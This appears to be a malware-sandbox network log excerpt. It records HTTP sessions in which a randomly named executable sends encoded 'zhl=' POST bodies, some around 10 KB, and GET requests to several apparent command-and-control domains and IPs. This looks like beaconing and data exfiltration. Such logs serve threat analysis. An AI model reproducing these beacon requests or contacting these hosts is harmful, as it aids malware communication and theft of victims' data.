                                                                            Host: www.komart.shop
                                                                            Origin: http://www.komart.shop
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.komart.shop/8r0w/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 51 78 6a 48 71 49 36 6b 75 67 39 74 52 2f 71 38 36 72 45 77 59 31 6b 43 45 56 4d 67 46 36 77 76 76 6b 78 79 66 4b 36 47 32 67 39 70 72 71 6f 44 2b 33 33 59 56 71 72 49 35 52 76 37 45 6d 6d 32 72 5a 33 4f 2f 50 71 59 37 55 75 75 73 71 57 69 39 41 70 6d 44 4b 4a 58 35 42 56 73 77 70 65 7a 4a 68 76 71 6a 32 4b 36 46 6f 4a 37 55 63 2f 54 42 71 55 57 35 4f 6b 74 58 34 39 66 78 6d 56 78 47 78 6a 5a 6c 74 51 57 62 55 33 57 52 42 52 37 6f 4b 67 4f 4e 70 55 46 61 41 37 38 43 64 76 63 68 4a 6f 72 65 73 32 63 6c 4c 38 47 47 36 71 51 41 43 56 2b 33 4a 51 6c 72 4e 79 54 56 48 42 6a 4c 67 3d 3d
                                                                            Data Ascii: zhl=QxjHqI6kug9tR/q86rEwY1kCEVMgF6wvvkxyfK6G2g9prqoD+33YVqrI5Rv7Emm2rZ3O/PqY7UuusqWi9ApmDKJX5BVswpezJhvqj2K6FoJ7Uc/TBqUW5OktX49fxmVxGxjZltQWbU3WRBR7oKgONpUFaA78CdvchJores2clL8GG6qQACV+3JQlrNyTVHBjLg==
Nov 5, 2024 15:23:48.412935972 CET | 668 | IN | HTTP/1.1 404 Not Found
                                                                            content-encoding: gzip
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:48 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 454
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                            Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 55729 | 133.130.35.90 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:50.096906900 CET | 813 | OUT | POST /8r0w/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.komart.shop
                                                                            Origin: http://www.komart.shop
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.komart.shop/8r0w/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 51 78 6a 48 71 49 36 6b 75 67 39 74 65 38 43 38 38 49 38 77 61 56 6b 42 42 56 4d 67 54 4b 77 72 76 6b 4e 79 66 4c 2f 5a 32 57 46 70 72 4f 73 44 2f 32 33 59 51 71 72 49 72 78 76 30 4c 47 6d 78 72 65 2f 47 2f 4b 43 59 37 55 36 75 73 72 6d 69 39 7a 42 6c 43 61 4a 56 68 78 55 71 75 5a 65 7a 4a 68 76 71 6a 33 36 51 46 6f 52 37 55 74 76 54 43 4c 55 52 33 75 6b 73 51 34 39 66 6e 57 55 34 47 78 6a 42 6c 76 6c 78 62 57 66 57 52 46 5a 37 70 59 59 4e 43 70 55 66 55 67 36 4d 55 66 79 37 76 73 68 4c 56 39 6a 39 76 71 4d 68 44 38 37 4b 52 7a 30 70 6c 4a 30 57 32 4b 37 6e 59 45 38 71 51 6c 36 36 57 35 65 39 41 31 55 65 65 6b 62 61 39 51 71 63 6c 72 63 3d
                                                                            Data Ascii: zhl=QxjHqI6kug9te8C88I8waVkBBVMgTKwrvkNyfL/Z2WFprOsD/23YQqrIrxv0LGmxre/G/KCY7U6usrmi9zBlCaJVhxUquZezJhvqj36QFoR7UtvTCLUR3uksQ49fnWU4GxjBlvlxbWfWRFZ7pYYNCpUfUg6MUfy7vshLV9j9vqMhD87KRz0plJ0W2K7nYE8qQl66W5e9A1Ueekba9Qqclrc=
Nov 5, 2024 15:23:50.978941917 CET | 668 | IN | HTTP/1.1 404 Not Found
                                                                            content-encoding: gzip
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:50 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 454
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                            Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 55730 | 133.130.35.90 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:52.651947975 CET | 10895 | OUT | POST /8r0w/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.komart.shop
                                                                            Origin: http://www.komart.shop
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.komart.shop/8r0w/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 51 78 6a 48 71 49 36 6b 75 67 39 74 65 38 43 38 38 49 38 77 61 56 6b 42 42 56 4d 67 54 4b 77 72 76 6b 4e 79 66 4c 2f 5a 32 56 6c 70 71 39 6b 44 2b 56 66 59 58 71 72 49 77 78 76 6b 4c 47 6e 30 72 59 58 34 2f 4b 4f 6d 37 57 43 75 74 4a 75 69 71 79 42 6c 49 61 4a 56 6f 52 56 74 77 70 65 71 4a 68 2f 32 6a 33 4b 51 46 6f 52 37 55 75 6e 54 55 71 55 52 36 4f 6b 74 58 34 39 44 78 6d 55 51 47 78 37 52 6c 73 4a 4c 61 6e 2f 57 51 6b 6c 37 71 74 30 4e 4c 70 55 42 54 67 36 55 55 66 2b 6b 76 73 56 35 56 39 57 6f 76 71 34 68 43 5a 4f 6e 4d 33 6f 32 2b 75 5a 4c 72 49 2f 39 51 57 77 4d 56 6c 37 48 57 63 58 39 62 46 6f 68 52 31 6d 33 6c 77 4c 5a 77 65 67 75 46 69 45 2b 4e 76 54 53 2b 2b 44 35 6c 4e 51 4d 6c 4d 35 47 79 4a 75 37 67 48 66 44 4d 71 68 6b 6b 4c 53 47 6a 67 7a 33 4c 42 6d 4f 75 39 52 6c 65 47 75 71 35 45 54 34 56 55 72 53 7a 74 77 47 31 30 73 56 32 56 69 4c 6b 58 70 37 68 41 76 4c 75 53 50 33 6d 6f 43 62 57 70 31 47 2f 4e 47 4e 54 74 79 61 37 44 6b 69 61 4a 78 2f 73 48 62 46 65 53 6a 32 52 41 [TRUNCATED]
Data Ascii: zhl= [TRUNCATED]
Nov 5, 2024 15:23:53.540708065 CET | 668 | IN | HTTP/1.1 404 Not Found
                                                                            content-encoding: gzip
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:53 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 454
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            12 | 192.168.2.4 | 55731 | 133.130.35.90 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:23:55.185609102 CET | 536 | OUT | GET /8r0w/?X8Rx1=znhhIbB8nN&zhl=dzLnp/+gugxgWqqjxp0mT2IbFg5vFvQvzyx0DqvE635uns4HxFL1cM/nxlijH3CXr4Dn+r6a2xCcjbq3+Q1mOYlqiQ0t9purOwXAnxy8DKlJc7DWVLNExsI= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.komart.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:23:56.084033966 CET | 883 | IN | HTTP/1.1 404 Not Found
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:55 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 693
                                                                            connection: close
                                                                            Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            13 | 192.168.2.4 | 55732 | 3.33.130.190 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:01.269614935 CET | 793 | OUT | POST /szao/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.teerra.shop
                                                                            Origin: http://www.teerra.shop
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.teerra.shop/szao/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=8MEyuQfLE51gjiTJi1mUY8YzT/mRHV6lMz+9tGpOl18mHOPeikom0Njoka48gV3myvvlE3YTUzaDeazxzvYoCWfoCYWo8RPxuiPgdnOZdYKxF0OtB+8ktR7IuEkjJ/Bb0E5kTC1kDcN6f15wBEADCVI+5zIyYQb5gWCa09neM1A9V4a2c+zijIi68bA/JKMcNA==


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            14 | 192.168.2.4 | 55733 | 3.33.130.190 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:03.812220097 CET | 813 | OUT | POST /szao/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.teerra.shop
                                                                            Origin: http://www.teerra.shop
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.teerra.shop/szao/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=8MEyuQfLE51giDjJgUmUMsY0W/mRM17NMzi9tH8FlnYmGrrejlomhNjo8q52u13tyvztE30TUzODebjxzdwnDGfqO4Xu4RPxuiPgdnazdYSxFHWtQv8nrh7HpEkjCfAS0E5CTHRODaB6f1pwBRgEblI0nDJMWDGX5GLC6vXmS0w6Q+LsNPS1xIGJhcJLEJxVWPCFiOk5+tYcxk9RFTohGZM=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            15 | 192.168.2.4 | 55734 | 3.33.130.190 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:06.362786055 CET | 10895 | OUT | POST /szao/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.teerra.shop
                                                                            Origin: http://www.teerra.shop
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.teerra.shop/szao/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=8MEyuQfLE51giDjJgUmUMsY0W/mRM17NMzi9tH8FlnQmGYTeiGAmn9joia57u13wyv7pE3IlUx2DRcjxxswnJGfqToWp8ROpuifkdnKzdYSxFCatQ+8nph7IuEknJ/B30AU5TGQ7Cqh6fVZwMCIESlI6mDJEWDKU5GXO6vPAS0E6c5qqeNWKppa17cd7GZh4SM/5vdID8vwJynofBw4CUOwWltlDYTVT+fjrgCid94dCLeqGf2zHq09hkUG8gBsr891EEgH+QSMapMyMoBxRmqF3aVR9AeJz0jBQat8wYbbxJ/9EB2xv6ViRlDZHHpHGkFVUwttTpDp2n9mx1RAu+Ahc1iaP7KgkOsHOOv6jrsB3dAKUGJbVlkC6H2EEarD6hWn9N+S8tNrtQEE/4KMbi3GxFHoIdDDUSHtutpPL1IKfnBi5+UrcyaW5QA2HQe7O4Q6FlqrhepuK776D+wOoTh5GozjL5ovNXPIjjGP/JaFSfqjP4LKBayC5Nk1+R3xfa8j8rZ/ZWwDO8K12xl7ztn6/dQFf/2QktPhAtkfCKwn8OgWJmxJiqG3/Ar3jxxLy43Q5/hKtsYXDtxM6c9jxXyKHYbcQg182JgddZxi4AIKLeXtrI2/Y0GHEm/ZqlRIhu96EWmio8dIck19cQqHG2E2yROphmWlt04/bspt+OprosW/FS68p4hBlZKRjaJgbE8t7ELGj4UBxQ6K9SB/uQcjdR7nnj48tUcuJJU7d5mdt5vLAQ+KY5OmoUx0BH3sTvc4g/USaJPfTamibnmU3aDQzy6vk/vhfn1BEIrmQG+j2Sol/U+HXyyvyEM1n5gCjp2UKHHD1/BXZsgcODYL2cJCwzBAxvttvrzwTTr9ramFzwtr8HsIqH1L5cijNd8SLIrINI+UHZd5HuxZ4Fy4UeuoF/8sLnJ6q0H9lOOTNHi0pKR6A+0p07QWkKIV9eY2rJSWUTAKHaSEPrvVUkokYKME6zG1W4feRu6ewIQvepogQgXVF [TRUNCATED]


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            16 | 192.168.2.4 | 55735 | 3.33.130.190 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:08.902976990 CET | 536 | OUT | GET /szao/?zhl=xOsStlDAPOZpiXvsnmuwA88PT6OXK0eKU2uFkXlZ1FsWMYGKmmEGy9m/gq1jsAT5roDCFnYyY1aFVaz80OwxPCjqIvTp6x+JqjH2NXebd4izNju9X+dPpzI=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.teerra.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:09.524441957 CET | 396 | IN | HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 05 Nov 2024 14:24:09 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 256
                                                                            Connection: close
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zhl=xOsStlDAPOZpiXvsnmuwA88PT6OXK0eKU2uFkXlZ1FsWMYGKmmEGy9m/gq1jsAT5roDCFnYyY1aFVaz80OwxPCjqIvTp6x+JqjH2NXebd4izNju9X+dPpzI=&X8Rx1=znhhIbB8nN"}</script></head></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            17 | 192.168.2.4 | 55736 | 31.31.196.17 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:14.681673050 CET | 799 | OUT | POST /p6ze/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dverkom.store
                                                                            Origin: http://www.dverkom.store
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dverkom.store/p6ze/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=yB/nA088yNsQsCyv11PoRi1WYSwGYFobYJgP/fgZbs76L5MJZ+63x922TMa42BvNZYQVAeIxJ3jT4tN+RvgWjMzUQsPmmpFgaXxb38sxVXzTddNKFhkankeH/4agitsDZzLhXCe6RdqA4Lf8dPl3bAcIDbcGe/KbM3ZsBaUkdffiWRTEBbJ/Pc4X5FWaKFhO3g==
                                                                            Nov 5, 2024 15:24:15.568255901 CET | 314 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:15 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            18 | 192.168.2.4 | 55737 | 31.31.196.17 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:17.225663900 CET | 819 | OUT | POST /p6ze/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dverkom.store
                                                                            Origin: http://www.dverkom.store
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dverkom.store/p6ze/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=yB/nA088yNsQuiCvzWXoUC1VFiwGTlofYJkP/ctGaaT6LY8JY8S39d22G8a5pxv4ZYc3AeExJ33T4td+RegRiczScMPo+JFgaXxb3/QbVX7TB99KKkIFkkeEpIagz9s9ZzLXXAqcReCA4JH8del0OwcSO7dqYMXhWWU/eJlKXrvJXXCeQqoodcckkCfuHGcHsi7wZEypq1CBK52Eh4DumOQ=
                                                                            Nov 5, 2024 15:24:18.122412920 CET | 314 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:17 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            19 | 192.168.2.4 | 55738 | 31.31.196.17 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 5, 2024 15:24:19.770385981 CET | 10901 | OUT | POST /p6ze/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dverkom.store
                                                                            Origin: http://www.dverkom.store
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dverkom.store/p6ze/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Ascii: zhl=yB/nA088yNsQuiCvzWXoUC1VFiwGTlofYJkP/ctGaab6KuAJabm3+d22asaCpxvlZYEzAf5MJxzT4LR+XsYR7szSBcPpmpFxaXhX3/AbVX7TB75KDRkFoEeH/4asittQZzCiXAuqSviA9a/8fsN0MQcUdLdyYMbEWS0zeJgRXsfJVWDePZkJIvYHx1/6AEs0nQjcfG+d0wiMK6DXx4bv/5mGVxkYNkd/vPhDJlVVr3FQ3eDzElwh2vrODibN62m/BMbkXO3+SHOyFKa2vVd0k42Zhc68Hc+G41QuN3eMQ6yCX6uisbEbTlrwdVzxSqlayjzlrvzqfK5pmZlgjjAMJRqg+z70xjwuMdA/9OZZTfuEvPyrTqnMMqwj+WJimRqima/iHa6JKUUfvBrZ2EoWKhUvlMePnCGRzI0Kk0Cpa13nm4UrNSn1z2bWlyEMpqnB5okEkFFd+vwB6VSrELA3TaB87H/gTZ0jB8/fB4QHctv6DIcJ3qDWOCFblknN5cYb/cJoAJdbceEnctkVfFth1YsTkdWmzb9ynN5D8uF5kkIBZpjZK1B5hCa9drNge9nu26Qwej0T0dPqRGkVdtcjLyJcXshjqiYBHOy+mMqowh7X/9ZaYkbZEaP7HDNpq5spFWPG2vYCTPK8AsYjeXhZZGWLbeHMraMROZ6NO36mgqy1Tb/ErAinqxzvzhlRnWSLoZkCRxudcWA50Vv5HQ3+Ebc6D+81x2bXyihIWysTmoFjpNBAuIoHFbQP8+eXueke3h0yctLUKLaLsRal8/3RxU8FEjzNPLSJ5jSdKeTLdV40CLWOBoGdiEzRO5xkYiz9PjaWdSkZjMdkqAZSLEqtc3wG/g4l13MjoF2PrW6v2B7I73r7PB8ng3N0D7Gt8hj9e80mMIFzOH3fRG4F+Z7g0/hnEsezTaTRUki4EtIowOxYbXKqe4Xgu13DvRZaMyxabNSdWE3glUFAQ0Xhn1OnQZsTZoT+geJKJzGNwLoIfOOSuzOG [TRUNCATED]
                                                                            Nov 5, 2024 15:24:20.667485952 CET | 314 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 05 Nov 2024 14:24:20 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
